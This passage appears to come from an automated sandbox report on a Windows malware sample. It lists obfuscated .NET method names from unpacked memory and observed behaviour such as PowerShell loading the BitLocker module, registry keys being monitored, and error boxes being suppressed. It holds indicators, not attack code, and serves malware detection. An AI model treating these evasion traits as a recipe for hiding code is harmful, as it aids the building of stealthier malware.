                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, ChekuZ3HCIwSmN8ZNP.csHigh entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, LDBvEBvJJ3O33kFquaV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, ySkLlbvukfHRnCTtESI.csHigh entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, aIGDt4fqLpMXZpZXEp.csHigh entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, vVt6wEQ8mT4XM4diZg.csHigh entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, amwXR0CPXsVauy8NYU.csHigh entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, oU7Yibkb84IpiWUtkd.csHigh entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, iGrKvbOUPHtmRDgSTJ.csHigh entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, BXplLTWfheod5WBiyg.csHigh entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, Nffji0ITJKe56hgjhg.csHigh entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, VTGJwXxvM7Ziv4PKG3.csHigh entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.csHigh entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, YqOlYl2eFwtfPkt21E.csHigh entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, MhaIhDzaPUNsFfpULt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, RqmCPZsVMMv5nbrMN6.csHigh entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, iNFWmT65K4oBOHdv97.csHigh entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, mdHoHt9MfgQhGOrMY7.csHigh entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, gkMdOYbUoH9rcjFeuZ.csHigh entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, PonY1JM82D8ygbKCcG.csHigh entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, OOJ1Sjc3ammghXBN9E.csHigh entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, ChekuZ3HCIwSmN8ZNP.csHigh entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, LDBvEBvJJ3O33kFquaV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, ySkLlbvukfHRnCTtESI.csHigh entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, aIGDt4fqLpMXZpZXEp.csHigh entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, vVt6wEQ8mT4XM4diZg.csHigh entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, amwXR0CPXsVauy8NYU.csHigh entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, oU7Yibkb84IpiWUtkd.csHigh entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, iGrKvbOUPHtmRDgSTJ.csHigh entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, BXplLTWfheod5WBiyg.csHigh entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, Nffji0ITJKe56hgjhg.csHigh entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, VTGJwXxvM7Ziv4PKG3.csHigh entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6870000.6.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6870000.6.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
